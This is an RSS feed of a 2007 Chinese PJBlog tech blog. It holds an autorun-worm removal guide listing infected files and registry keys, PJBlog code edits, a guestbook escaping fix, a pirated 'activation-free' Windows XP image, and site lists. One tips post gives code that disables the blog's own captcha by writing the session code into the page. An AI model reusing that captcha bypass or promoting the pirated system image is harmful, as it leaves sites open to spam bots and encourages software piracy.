<![CDATA[曾经感动Blog]]> http://www.9427188.com/ zh-cn PBlog2 v2.4 曾经感动Blog http://www.9427188.com/images/logos.gif http://www.9427188.com/ 曾经感动Blog http://www.9427188.com/default.asp?id=279 <![CDATA[auto.exe,zinforms.dll,rivkae.exe,Kvsc3.exe,MsIMMs3]]> ui47@163.com(admin) Wed,17 Oct 2007 08:43:08 +0800 http://www.9427188.com/default.asp?id=279
解决方法:

进行如下操作前,请不要进行任何双击打开磁盘的操作。所有下载的工具都直接放桌面上。

思路
1、安全模式下操作
强制删除文件 可借助xdelbox, powerRMV等。
C:\Autorun.inf
C:\auto.exe
d:\Autorun.inf
d:\auto.exe
e:\Autorun.inf
e:\auto.exe
f:\Autorun.inf
f:\auto.exe
C:\WINDOWS\system32\4869E900.EXE
C:\WINDOWS\system32\zinforms.dll
C:\WINDOWS\DOWNLO~1\CnsMin.dll
C:\WINDOWS\rivkae.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\MsIMMs32.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\msccrt.exe
C:\WINDOWS\MsPrint32D.exe
C:\WINDOWS\upxdnd.exe
C:\WINDOWS\DbgHlp32.exe
C:\WINDOWS\system32\DbgHlp32.dll
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\MsPrint32D.dll
C:\WINDOWS\system32\NVDispDrv.dll
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\GenProtect.dll
C:\Windows\System32\LYLoader.exe
C:\Windows\System32\LYLoadbr.exe
C:\Windows\System32\LYLeador.exe
C:\Windows\System32\LYLoador.exe
C:\Windows\System32\LYLoadar.exe
C:\Windows\System32\LYLoadmr.exe
C:\Windows\System32\LYLoadhr.exe
C:\Windows\System32\LYLoadqr.exe

2.SREng进行如下的操作

启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows] 此项不是删除,是编辑。点击编辑,数值修改为空(即删除其内容,即可)
          <AppInit_DLLs><zinforms.dll>        [] 修改为 <AppInit_DLLs><>  

启动项目-->注册表的如下各项删除:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
       <CnsMin><Rundll32.exe C:\WINDOWS\DOWNLO~1\CnsMin.dll,Rundll32> [(Verified)"INTER CHINA NETWORK SOFTWARE (BEIJING) CO., LTD."]
       <GenProtect><C:\WINDOWS\rivkae.exe> []
       <Kvsc3><C:\WINDOWS\Kvsc3.exe> []
       <MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
       <cmdbcs><C:\WINDOWS\cmdbcs.exe> []
       <msccrt><C:\WINDOWS\msccrt.exe> []
       <MsPrint32D><C:\WINDOWS\MsPrint32D.exe> []
       <upxdnd><C:\WINDOWS\upxdnd.exe> []
       <DbgHlp32><C:\WINDOWS\DbgHlp32.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
       <MSDWG32><LYLoadbr.exe> [N/A]
       <MSDCG32       ><LYLeador.exe> [N/A]
       <MSDOG32><LYLoador.exe> [N/A]
       <MSDSG32><LYLoadar.exe> [N/A]
       <MSDMG32><LYLoadmr.exe> [N/A]
       <MSDHG32><LYLoadhr.exe> [N/A]
       <MSDQG32><LYLoadqr.exe> [N/A]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
       <{AEB6717E-7E19-11d0-97EE-00C04FD91975}><zinforms.dll> [N/A]
       <{AEB6717E-7E19-11d0-97EE-00C04FD91974}><winforms.dll> [N/A]
       <{AC2DC2EF-5165-40A3-8CDF-41DCA1B0901A}><C:\WINDOWS\system32\shlhook.dll> [Beijing Rising Technology Co., Ltd.]
       <{32CD708B-60A7-4C00-9377-D73EAA495F0F}><C:\WINDOWS\system32\RavExt.dll> [Beijing Rising Technology Co., Ltd.]
       <{D157330A-9EF3-49F8-9A67-4141AC41ADD4}><C:\WINDOWS\DOWNLO~1\CnsHook.dll> [(Verified)"INTER CHINA NETWORK SOFTWARE (BEIJING) CO., LTD."]

==================================
启动项目-->服务---Win32服务中的如下项目删除:
[4DA52100 / 4DA52100][Stopped/Auto Start]
<C:\WINDOWS\system32\4869E900.EXE -k><Microsoft Corporation>

最后用windows清理助手或者金山清理专家等工具清理 。


]]> http://www.9427188.com/default.asp?id=278 <![CDATA[!PJBLOG一次性删除所有引用通告的办法]]> ui47@163.com(admin) Tue,16 Oct 2007 11:17:53 +0800 http://www.9427188.com/default.asp?id=278 PJblog的trackback漏洞被一些网络营销的人利用,发布大量垃圾引用通告,使得我blog里面充满了垃圾引用,而PJblog后台只提供了一次性删除20条引用通告的功能,而我的垃圾引用通告有将近9000条,这说明我要反复操作400多次才能清理完这些垃圾……….
还是自己动手改代码吧,让你一次性删除所有的引用通告,当然,前提时你的引用通告太多而又基本上都是垃圾…..
大家打开根目录下的ConContent.asp 找到2183行的

程序代码
conn.execute("Delete * from blog_Trackback where tb_ID="&t1)
把它改成

程序代码
conn.execute("Delete * from blog_Trackback")
保存以后就ok了,原理很简单,原来的数据库删除语句需要传回来一个参数来指定要删除的内容,现在我把参数去掉了,所以每次选中要删除的引用通告并点击删除时就会删除所有的通告!
海量的垃圾信息被删除以后大家就可以把上面的语句恢复回来,以防以后每次都删除所有的引用时误删了有用的信息,当然如果你的引用里面垃圾信息不那么多,你只好一条一条去删除了:)

而我BLOG里 引用通告有接近2W多条.. 这下清净了  数据库 减小到原来的5.4倍左右  呼... ]]> http://www.9427188.com/default.asp?id=277 <![CDATA[PJBLOG 完全删除引用功能]]> ui47@163.com(admin) Tue,16 Oct 2007 11:11:18 +0800 http://www.9427188.com/default.asp?id=277
1、修改数据库

安装OFFICE里的ACCESS软件;

打开blogDB文件夹,把里面的数据库文件(默认为PBLog2.asp)的asp后缀改为mdb后缀;

双击用ACCESS打开,删除整个 blog_Trackback 表:找到,右击,删除;

若是装了防垃圾引用或是元旦版可以顺道删除 blog_Info 表下的 blog_tbKey 字段;

删除后关闭ACCESS,把数据库文件名改回为asp。

2、修改class文件夹下的cls_article.asp

用DW或EP等编辑软件打开cls_article.asp,约150行(2.6)或180行(元旦版),也就是在“显示日志评论内容”一块找到如下代码:

SQL="Select comm_ID,comm_Content,comm_Author,comm_PostTime,comm_DisSM,comm_DisUBB,comm_DisIMG,comm_AutoURL,comm_PostIP,comm_AutoKEY,comm_hasReply FROM blog_Comment Where blog_ID="&LogID&" and comm_parentID=0 UNION ALL Select 0,tb_Intro,tb_Title,tb_PostTime,tb_URL,tb_Site,tb_ID,0,'127.0.0.1',0,0 FROM blog_trackback Where blog_ID="&LogID&" orDER BY comm_PostTime "&comDesc

整个换成:

SQL="Select comm_ID,comm_Content,comm_Author,comm_PostTime,comm_DisSM,comm_DisUBB,comm_DisIMG,comm_AutoURL,comm_PostIP,comm_AutoKEY FROM blog_Comment Where blog_ID="&LogID&" orDER BY comm_PostTime "&comDesc

保存

3、删除trackback.asp

4、删除相关显示

包括class文件夹、Template文件夹、search.asp、ConContent.asp等;还有在后台-设置模块-编辑html,修改Search和BlogInfo两模块,删除相关显示。

这些东西,删或者不删除都不会影响使用,只是表面显示。具体删除方法就不多说了。
]]> http://www.9427188.com/default.asp?id=276 <![CDATA[PJBLOG2 V2.7 build 04 留言本漏洞 修正方法]]> ui47@163.com(admin) Tue,16 Oct 2007 08:35:48 +0800 http://www.9427188.com/default.asp?id=276 Blog目录/Plugins/GuestBook/guestbook.asp
Blog目录/class/cls_article.asp

查找guestbook.asp中的
<%=UBBCode(HtmlEncode(GuestDB(”book_Content”)),0,GBSet.getKeyValue(”ubbCode”),GBSet.getKeyValue(”ImgCode”),GBSet.getKeyValue(”autoURL”),1)%>
改成
<%=CheckStr(UBBCode(HtmlEncode(GuestDB(”book_Content”)),0,GBSet.getKeyValue(”ubbCode”),GBSet.getKeyValue(”ImgCode”),GBSet.getKeyValue(”autoURL”),1))%>

查找cls_article.asp中的
<%=UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount))%>
改成
<%=CheckStr(UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount)))%>

这样修改好两个文件后,就应该不会有此漏洞问题了
]]> http://www.9427188.com/default.asp?id=275 <![CDATA[WINXPSP2电脑城装机10.1标准版 ]]> ui47@163.com(admin) Sun,14 Oct 2007 11:28:24 +0800 http://www.9427188.com/default.asp?id=275 MD5:bc107bf93fdd9ee39531a90f2f75891d
================================================
猪猪猫.CN-WINXPSP2电脑城装机10.1标准版 2007.9  
================================================
特点:稳定安全、兼容性好

下载文件 点击下载电脑城装机10.1标准版



一、系统介绍

采用WindowsXPSP2简体中文专业免激活版为蓝本,目前支持在线升级。
使用离线升级包升级至2007.09.30的所有补丁。
默认系统磁盘格式为FAT32格式,第一次进系统时会提示是否转换成NTFS格式。


二、系统特色

+系统 完整无缺。
+采用 JUJUMAOGHOST2007克隆终结者(含驱动安装管理器,默认20秒可选择是否安装全部或某部分驱动)。
+采用 微软集成驱动的方式预装主板和IDE/RAID/SATA/SCIS驱动,让系统在各类机器上恢复的成功率接近100%。
+增加 支持原生SATA光驱启动恢复。
+增加 WINPE精简版(可在SATA光驱自动恢复失败的情况下,恢复系统)。
+采用 智能判断CPU类型的方式,为AMD双核用户自动安装优化程序和相应的系统补丁。
+升级 Windows Media Player版本到10,解决网友无法在线观看网络电视和电影的问题。
+保持 以前版本的游戏性!全面杀毒测试,不含任何病毒和木马。
+采用 JUJUMAODiskGhost2.0(猪猫硬盘克隆备份管理器--硬盘安装器)
+更新 多款精美主题
+添加 精美壁纸近100张(新增变形金刚壁纸)
+保留 系统自带经典、默认两主题
+保留 完整系统鼠标指针
+默认 超酷的VISTA开关机声音
+修改 TCP/IP连接数为2048
+优化 系统运行速度


三、集成驱动(容量为201M):

+[主板]:
Intel芯片组 v8.1.1.1003
nForce2芯片组(含IDE、SMBus、GART、memctl) v5.1 WHQL
nForce4芯片组(含IDE、SMBus) v6.66 WHQL
nVidia C51G芯片组(含IDE、SMBus) v18.22 WHQL
nForce5芯片组(含IDE、SMBus) v9.16 WHQL
nVIDIA MCP61芯片组(含IDE、SMBus) v11.08WHQL
nVIDIA MCP68芯片组
VIA 芯片组HyperionPro v5.06A
ULi 芯片组(含IDE、SMBus)V2.20
ATI 芯片组南桥驱动v6.9
+[显卡]:
NVIDIA GeForce系列显卡 WHQL(含G8系列驱动)
ATI Radeon系列显卡 v7.5
Intel 845G集成显卡 v14.10
Intel 865G、910G、915G、945G集成显卡 v14.17
Intel 945G、965G、G31、G33集成显卡 v14.29
SiS系列集成显卡(SiS315/650/651/740/760)
VIA K8M800/P4M800集成显卡
ATI690
+[声卡]:
Realtek 系列(ALC101/201/650/655/658/850) v3.96
Realtek HD Audio(ALC880/ALC882/ALC883/ALC885/ALC888/ALC260/ALC262/ALC861)音频芯片驱动包 v1.54
SoundMAX_AD188X
SoundMAX_HD AD198X
C-Media CMI8738
C-Media CMI9738/9739A/9761
C-Media CMI9880
SiS 7012
SigmaTel_STAC9750
ALi 板载声卡
VIA 全系列板载声卡
+[网卡]:
Realtek 系列网卡(RTL 8139/8169/8100/8111/8168)
Realtek RTL 8185L/8187L无线网卡
Broadcom 系列千兆网卡
Marvell Yukon系列千兆网卡 v8.49
3COM 3C940/3C2000
nVida系列集成网卡(nForce2、nForce4、C51G、nForce5、nVIDIA MCP61)
Intel 系列百兆/千兆网卡 v10.3
SIS 900
ULI 系列集成网卡
VIA VT6103/VT6105/VT6122
+[摄像头]
VIMICRO USB PC Camera (ZC0301PLH)


四、安装说明

+光盘安装(推荐)
+请用刻录软件nero,选择"映像刻录"方式来刻录ISO文件。
+刻录之前请先校验一下文件的准确性,刻录速度推荐16X!
+安装请设置光盘启动,然后选择第1个就可以自动安装!
+装多硬盘的机器请务必把除了要安装系统的硬盘保留,其他的暂时拔掉数据线和电源,防止克隆
错误分区,导致硬盘数据丢失!
+推荐使用质量较好的刻录光盘,否则可能导致系统安装出错。
+硬盘安装器安装
请提取ISO中JUJUMAODiskGhost.exe(硬盘安装器)、JUJUMAO.GHO、GHOST.exe到硬盘根目录,比如E:\
运行JUJUDiskGhost,找到JUJUMAO.GHO即可恢复。

五、软件介绍

+预装 Directx 9.0C 2007.08
+预装 OFFICE2003 SP3 精简版(WORD、EXECL、POWERPOINT三组件、公式编辑器及VBA支持)
+预装 WINRAR3.7 美化版                  
+预装 矮人DOS工具箱5.3
+预装 QQ2007 7.0 正式版
+预装 QQ游戏大厅
+预装 五笔86
+预装 搜狗拼音输入法3.0 
+预装 酷我音乐
+预装 暴风影音2007
+预装 实用工具38项,绿色环保,安全无毒。

六、测试机器

+AMD系列

NVIDIA NF2,Athlon XP 1.8G,迈拓160G IDE硬盘,512M DDR
NVIDIA NF4,Athlon64 3000+,西捷160GSATA硬盘,1G DDR
NVIDIA 520,Athlon 64 X2 3600+,160G 西部数据 SATA 硬盘,1G DDRII
NVIDIA C61,Athlon 64 X2 3600+,160G 西部数据 SATA 硬盘,512M DDRII
NVIDIA C68,Athlon 64 X2 3800+,160G 西部数据 SATA 硬盘,1G DDRII
ATI 690G,Athlon 64 X2 4000+,320G SATA 硬盘+200G SAMSUNG IDE 硬盘,2G DDRII


+INTEL系列

VIA 694, CII 800,40 西捷 IDE 硬盘,512M SDRAM
Intel 815EP,P3 733,80G SAMSUNG IDE 硬盘,512M SDRAM
Intel 845G,P4 1.6G,Si3112r SATARaid 阵列卡,200G SAMSUNG IDE 硬盘,1G DDR
Intel 915G,赛扬D 346,80G 西部数据 SATA 硬盘,512M DDR
Intel 875,P4 3.0G,250G 西部数据 SATA 硬盘,1G DDR
Intel G965,Core 2 6300,250G 西部数据 SATAII 硬盘,2G DDRII


下载文件 点击下载此文件
]]> http://www.9427188.com/default.asp?id=274 <![CDATA[网页设计者值得一去的地方]]> ui47@163.com(admin) Sat,13 Oct 2007 14:49:10 +0800 http://www.9427188.com/default.asp?id=274
一、网页设计类

1、 网站名称:有风的日子
  网站地址:http://www.windstudio.net/
  简介:
  很不错的一个设计网站,我刚开始学习网页设计的时候就知道她了,她最有特色的内容就算是精品插件栏目了,里面包括有Photoshop 滤镜、Dreamweaver 插件、Flash 相关,都是很实用的好东东。同时网站的符号字体栏目也挺有自己的特色。

2、 网站名称:蓝色理想
  网站地址:http://www.blueidea.com/
  简介:
  网页编辑方面的大哥大人物,网站关于网页制作方面的教程既全面又专业,而且各类教程的更新速度很快。她的经典论坛的人气也是相当的旺。同时该网站的一个很大的特点就是会时不时推出一些好书的介绍,这些都是不容易买到的。

3、 网站名称:七色鸟设计
  网站地址:http://www.colorbird.com/
  简介:
  七色鸟设计是一个致力于传播设计文化,研究视觉设计艺术、提高大众审美意识的非盈利性的艺术指导网站,里面的设计资源相当丰富而且有特色

4、 网站名称:视觉中国
  网站地址:http://www.chinavisual.com/
  简介:
  这个是我最爱的一个网站了,我第一次把网页制作和网页设计区分开来,就是通过看了这个网站上的很多文章得出来的,里面的很多知识以平面为主,以前她的服务器不怎么好,经常出现服务器负载过重的情况,但是现在已经好了。

5、 网站名称:5D多媒体 
  网站地址:http://www.5dmedia.com/
  简介:
  5D的含义是指其探讨五个方面的内容:声音、图象、动画、多媒体交互、Internet网开发。该网站是目前国内最大的多媒体技术站点,要想了解多媒体方面的信息还真的是要进去看看。

6、 网站名称:设计联盟
  网站地址:http://www.szdesign.org/
  简介:
  我非常喜欢她的作品栏目,可以看到很多人的创作,欣赏别人的创作的同时,自己也可以得到很多的启示

7、 网站名称:点燃灵感
  网站地址:http://www.fwcn.com/
  简介:  
  这里是Firework的天堂,教程,插件,资源,应有尽有

二、图象处理类
 
1、 网站名称:中国PHOTOSHOP联盟
  网站地址:http://www.photoshopcn.com/
  简介:
  网页设计中的平面处理软件,PS是绝对的老大,中国PHOTOSHOP联盟就是PS教学方面的老大

2、 网站名称:图象谷
  网站地址:http://pstxg.com/
  简介:
  搞图象处理的好去处,她的资源下载栏目很出色

三、动画设计类

1、 网站名称:闪客帝国 
  网站地址:http://www.flashempire.com/
  简介:
  我很早以前做的第一个个人网站就是仿照该网站做的,呵呵,我记得那个时候的帝国还不是现在这个样子。里面关于Flash的教程都很经典。而且论坛里面是高手如云。

2、 网站名称:闪吧
  网站地址:http://www.flash8.net/
  简介:  
  我第一次知道这个网站是通过电脑爱好者介绍的,具体哪期忘记了,我记得有整整一个版面来介绍这个网站的故事,所以就跑来了,一看就喜欢上了,觉得里面的资料真是太丰富了,和帝国难分高下。

3、 网站名称:数码动力国际
  网站地址:http://www.showgood.com/
  简介:
  该网站已经不需要我们再说,她推出的Flash实在是太棒了!

4、 网站名称:闪盟在线
  网站地址:http://www.flashsun.com/
  简介:
  网站的优秀以不需多说,我很喜欢她的竞技场栏目

四、网页素材类

1、 网站名称:桌面城市
  网站地址:http://www.deskcity.com/
  简介:
  一流的图象资料宝库

2、 网站名称:素材精品屋 
  网站地址:http://www.sucaiw.com/
  简介:
  也是网页设计素材库,她和桌面城市主要在于一个偏全,一个偏精!

五、网页代码类

1、 网站名称:代码中国
  网站地址:http://www.codechina.net
  简介:
  一个专业、全面的源代码下载网站。简洁实用的页面,专业详尽的分类,丰富全面的代码资源,合理的得体的技术运用,处处透露出专业性。无论哪一方面的代码,在这里几乎都找得到,而且在代码社区中,你可以发布一些求助信息,讨论一些技术话题,让你充分体会到网络的互动性。

2、 网站名称:天新网源码下载
  网站地址:http://www.21tx.com/src
  简介:
  天新网是一个较早的个人网站,也是提供源码下载较早的一个网站。分类较为详尽:首先按语言(或技术)分成大类,每一大类再按代码的用途分为小类,这样,使用起来方便快捷。

3、 网站名称:波士源码下载
  网站地址:http://www.boss8u8.com/scdown
  简介:
  主要提供WEB后台程序代码下载。尽管包含的类别有限,代码的丰富程度比不上前两个网站,但是它分类很详细,几乎包含了目前网站上常见的所有程序代码,如果你正在寻找一些WEB后台程序代码,这应该是个好去处。

六、WEB技术类

1、 网站名称:goEway.com
  网站地址:http://www.goeway.com
  简介:
  “从不懂得上网,到网络高手”,这是goEway.com的口号。当然,口号就是口号,重要的是,从这个站合理的栏目设置、人性化的设计、丰富的内容、大量实用的文章来看,他们在切切实实地这样做着。

2、 网站名称:HTML.CN
  网站地址:http://www.htmlcn.com
  简介:
  不用我多说,从站点和网址你就知道这是一个什么类型的网站了。不过,这里可不仅仅有HTML。还有网页制作软件。CSS、JavaScript以及ASP、PHP等等,可以说从网页制作到web编程都涉及到了。尽管它的内容还不能说十分丰富,但都很实用。

3、 网站名称:流媒体中国技术频道
  网站地址:http://www.liumeiti.com/technology
  简介:
  流媒体指在Internet/Intranet中使用流式传输技术的连续时基媒体(如relsystem.MPEG等)。顾名思义,流媒体中国就是一个以“流媒体”为主题的网站,在它的技术频道中,有大量的相关文章。对于从事或有心从事这方面技术的网友来说,绝对是一个不可多得的好去处。另外,有什么疑问和心得,你还可以去“流氏论坛”去讨论。

4、 网站名称:虚拟无忌
  网站地址:http://www.86vr.com
  简介:
  虚拟现实(简称VR)技术虽然出现已经有几年,但一直没有普及起来。随着宽带的普及以及它自身特有的魅力,将来一定会有发展。虚拟现实的方方面面在这都可以找到。

七、加盟网站类

做网页的人都希望把自己的网站推销出去,推销的方法有很多,通过加盟品网网站就是个不错的方法,在那里你推销自己的网站,通过品网的评价后,发布出来,这样可以让更多的人知道你的网站。下面这些就是我找的几个在国内比较有名的品网网站,网站的评价我就没写了,因为性质都差不多。

1> 网站名称:零刻联盟
  网站地址:http://www.linkmeng.com
2> 网站名称:贵族品网
  网站地址:http://www.21pick.com/index.asp
3> 网站名称:汕头网页设计师联盟
  网站地址:http://www.0754design.com
4> 网站名称:浪掏沙
  网站地址:http://www.langtaosha.net/pick/index.asp
5> 网站名称:中原品网
  网站地址:http://www.zpick.com/pick
6> 网站名称:文化空间
  网站地址:http://www.xiaoxiang.net/web
7> 网站名称:94cool
  网站地址:http://94cool.org/meng/default.asp
8> 网站名称:星期天网站联盟社区
  网站地址:http://www.7sunday.com/
9> 网站名称:蚁盟
  网站地址:http://www.yimeng.org/
10> 网站名称:中国网页设计师联盟
  网站地址:http://www.dreamofdesign.com/chinese/


原文网址:http://iyuer.com/ilank/article.asp?id=108
原文网址:http://iyuer.com/ilank/article.asp?id=108
原文网址:http://iyuer.com/ilank/article.asp?id=108]]> http://www.9427188.com/default.asp?id=273 <![CDATA[Pjblog技巧集合]]> ui47@163.com(admin) Sat,13 Oct 2007 08:02:06 +0800 http://www.9427188.com/default.asp?id=273 ===================================================
一个服务器上如果存在多个Cookies域一样的PJBlog,那么这些Bolg都将无法运行,修改方法:打开Blog根目录下的“const.asp”,修改15、16行Const CookieName=""和Const CookieNameSetting=""的值。

02. 更改数据库后缀名,消除“数据库连接出错”的错误提示
===================================================
个别空间不支持以“.asp”为后缀名的Access数据库,会出现“数据库连接出错,请检查连接字串!”的错误提示,修改方法:首先把blogDB目录下的数据库文件由*.asp改为*.mdb,然后更改“const.asp”第37行“Const AccessFile”的数据库路径和文件名。

03.1. 修改验证码,使它永远只出现四个“0”
===================================================
在个人Blog中使用验证码没什么意义,PJBlog后台又没有关闭验证码的选项,所以最好的办法就是让它只显示最简单的符号,本站把验证码全部改为4个“0”:
找到common\GetCode.asp,修改“Dim i, ii, iii”下面这段为:
Const cOdds = 0 ' 不出现杂点
Const cAmount = 1 ' 就取一个符号,默认是0
Const cCode = "0123456789" '这一行可以不用改的

03.2. 使系统自动填写验证码(再复杂的验证码也不用手工输入了,呵呵(0927)
===================================================
在Blog根目录新建一个“*.asp”文件,在里面填写以下代码:
<script>if(parent.document.all.validate)parent.document.all.validate.value="<%=Session("GetCode")%>";</script>
然后在footer.asp的最上面插入一句:
<iframe frameborder="no" height=0 width=0 src="*.asp"></iframe>

04. 在common/library.asp中修改侧边栏“用户面板”的条目名称
===================================================
侧边栏用户面板中默认的项目名称有长有短,看着很不美观,修改library.asp第83行以下的内容,本站把它们都改为四个字的,即“系统管理”“发表日志”“编辑草稿”“修改资料”“退出系统”。

05. 修改建站时间
===================================================
在后台“设置模块”找到模块标识为“BlogInfo”模块,点击后面的“编辑HTML源代码”进行修改;另外,侧边栏统计信息里的留言默认是没有链接的,在这里也可以进行编辑把链接加上,把整句代码改成
程序代码
留言: <a href="LoadMod.asp?plugins=GuestBookForPJBlog"><b>$blog_MessageNums$</b> 个</a><br/>

06. 在侧边栏上部增加公告栏或站长信息栏
===================================================
进入后台“界面与插件”-“设置模块”,在页面下方新建一个“侧边模块”,模块标识任意,名称为“公告板”或“站长档案”,注意排序要设为最小,点击“保存模块”。保存后点击后面的“编辑HTML源代码”,如果是用作静态公告板,则直接往里边写字就行了。如果是用作站长信息栏,可以在里面添加照片、说明什么的,可以效仿以下代码:
程序代码
<div style="PADDING-RIGHT: 4px; PADDING-LEFT: 4px; PADDING-BOTTOM: 4px; PADDING-TOP: 4px; TEXT-ALIGN: left">
<a href="点击图片后指向的链接地址" target="_blank"><img border="0" alt="XHTML 1.0 Transitional" src="站长信息的图片地址"/></a>
</div>

07. 在日志正文上方增加一滚动的公告板或广告板
===================================================
进入后台“界面与插件-设置模块”,在页面下方新建一个“内容模块”,模块标识和名称任意,注意排序要比“ContentList”小,点击“保存模块”。保存后点击后面的“编辑HTML源代码”,填入以下代码:
程序代码
<div style="CLEAR: none; BORDER-RIGHT: #dbdbd0 1px solid; BORDER-TOP: #dbdbd0 1px solid; BACKGROUND: #fff; MARGIN: 5px; BORDER-LEFT: #dbdbd0 1px solid; WIDTH: 98%; BORDER-BOTTOM: #dbdbd0 1px solid; HEIGHT: 15px">

<div style="PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEFT: 3px; FLOAT: left; PADDING-BOTTOM: 0px; WIDTH: 5px; COLOR: #2e8b57; PADDING-TOP: 6px">公</div>
<div style="PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEFT: 1px; FLOAT: left; PADDING-BOTTOM: 0px; WIDTH: 5px; COLOR: #2e8b57; PADDING-TOP: 6px">告</div>

<div style="MARGIN: 3px"><marquee  onmouseout="this.start()" scrollamount="3" scrolldelay="15" direction="left" height="15">
<font color="#999999">[时间或编号]</font><font color="#0000ff"><b>第一条公告题头</b>第一条公告内容</font>

<font color="#999999">[时间或编号]</font><font color="#0000ff"><b>第二条公告题头</b>第二条公告内容</font>

</marquee></div></div>
其中WIDTH: 98%是宽度,HEIGHT: 15px是高度(这个高度为显示一行文字),scrollamount="3"为滚动速度,direction="left"为滚动方向(left是从右到左)。


===========================pc-mac 修改的公告代码==============================
<table cellpadding="0" cellspacing="0" width="98%" height="30" border="0">
        <!-- MSTableType="layout" -->
        <tr>
                <td height="30" valign="middle" width="60">
                <p align="center"><font face="宋体" color="#009900">
                <span style="font-size: 9pt; font-weight: 700">公告:</span></font></td>
                <td height="30" valign="middle" width="852">
                <font face="宋体" color="#0000ff"><span style="font-size: 9pt; font-weight: 700">
                <marquee  onmouseout="this.start()" valign="middle" scrollamount="3" scrolldelay="15" height="12">博客开通,诚邀友情链接。</marquee></span></font></td>
        </tr>
</table>

===========================修正了公告与内容的对齐==========================
08. 增加相册功能,手工添加相册首页链接
===================================================正在筹备当中,敬请关注。

X1. 在线音乐播放器修改指南
===================================================
本站采用的播放器是aboutplayer(随机版),相比其他同类软件主要有以下几个优点:a.可以添加播放本地文件;b.在同一页面可查看播放列表并选曲;c.碰到链接失效的文件会自动重试3次,如果判断真的失效,会自动接着播放其他的曲目(主要优点)。

01.把播放器解压缩到“music”目录并放在你的网站根目录下;
02.在你的Blog目录下新建一个“index.htm”的文件,添加如下的框架代码:
程序代码
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>╃电老虎成长日记╉音乐版</title>
</head>
<frameset rows="*,22" frameborder="NO" border="0" framespacing="0">
<frame src="/PJBlog/default.asp(注:Blog首页面的地址)" name="mainFrame" scrolling="yes">
<frame src="/music/selectindex.htm(注:音乐播放器的地址)" name="bottomFrame" scrolling="NO" noresize>
</frameset>
<noframes></noframes>
</html>
上面的"*,22"表示Blog主体页面在上方,音乐播放器在下方,且播放器的高度为22象素;
03.在播放器中增加关闭播放器的功能。在播放器的首页中加如下代码:
<a href="http://你的Blog首页面(如index.asp)" target="_top">关闭播放器</a>
04.播放列表为:music/js/data.js,文件里附有操作说明。

X2. 设置自动跳转页面
===================================================
有时候网站程序不是放在空间根目录下的,这时候需要一个从根目录跳转到子目录的文件,把以下代码存成index.htm或index.asp放在网站根目录即可:
程序代码
<html>
<head>
<meta http-equiv="Content-Language" content="zh-CN">
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<title></title>
</head>
<body>
<meta http-equiv="refresh" content="0.1;url=PJBlog/index.htm(根据自己的情况修改)">
</body>
</html>

X3. 给每个Skin增加了四彩鼠标样式
===================================================
01.把四彩鼠标指针拷贝到“images”目录,
02.修改每个皮肤文件夹里的global.css,在body段添加一行“cursor:url('./images/blue.cur');”
03.修改每个皮肤文件夹里的link.css,分别给a:link、a:visited和a:active添加鼠标指针样式;

===================================================

00. 所有日记在普通模式时皆为回缩模式

打开class/cls_default.asp,找到代码:<div class="BttnE" ></div>,将其前后的语句:<%If webLogArr(9,PageCount)=True Then%>和<%end if%>删除。

然后打开class/lcls_logAction.asp,找到:Temp2=Replace(Temp2,"<$ShowStyle$>"," style=""display:none"""),将其前后 if 到 end if 的代码都删除
===================================================

37. 各种样式的光标
auto :标准光标
default :标准箭头
hand :手形光标
wait :等待光标
text :I形光标
vertical-text :水平I形光标
no-drop :不可拖动光标
not-allowed :无效光标
help :?帮助光标
all-scroll :三角方向标
move :移动标
crosshair :十字标
e-resize
n-resize
nw-resize
w-resize
s-resize
se-resize
sw-resize
===================================================

38.页面进入和退出的特效
进入页面<meta http-equiv="Page-Enter" content="revealTrans(duration=x, transition=y)">
推出页面<meta http-equiv="Page-Exit" content="revealTrans(duration=x, transition=y)">
这个是页面被载入和调出时的一些特效。duration表示特效的持续时间,以秒为单位。transition表示使用哪种特效,取值为1-23:
  0 矩形缩小
  1 矩形扩大
  2 圆形缩小
  3 圆形扩大
  4 下到上刷新
  5 上到下刷新
  6 左到右刷新
  7 右到左刷新
  8 竖百叶窗
  9 横百叶窗
  10 错位横百叶窗
  11 错位竖百叶窗
  12 点扩散
  13 左右到中间刷新
  14 中间到左右刷新
  15 中间到上下
  16 上下到中间
  17 右下到左上
  18 右上到左下
  19 左上到右下
  20 左下到右上
  21 横条
  22 竖条
  23 以上22种随机选择一种
===================================================
x7.去掉皮肤横幅处的网站名称及简介
===============================================================
#container #header #blogname{display:none}
#container #header #blogname #blogtitle{display:none}

x8.去除超级链接的下划线
===============================================================
个别皮肤的超级链接都是有下划线的,有时候看着不太美观,我们可以通过修改link.css把它们去掉。控制下划线的属性是“text-decoration”,有下划线的参数是“text-decoration:underline”,没有下划线的参数是“text-decoration:none”。如果不使用“text-decoration”属性,默认是有下划线的。你可以把不想要下划线的地方由“underline”替换成“none”,或者干脆把所有的都替换了。

x8.重装系统应该备份的文件
===============================================================
1.备份blogDB目录下的数据库
2.备份attachments目录下的文件,这个目录里都是上传的附件
3.备份Plugins目录下的文件,这里面都是BLOG的插件
4.备份skins目录下的文件,这里面都是皮肤文件
5.备份根目录下的plugins.asp文件

基本上就这些了,如果BLOG出现了什么问题的话,直接用这些文件覆盖回去就可以了。

x9.禁止复制的代码和方法
=============================================================
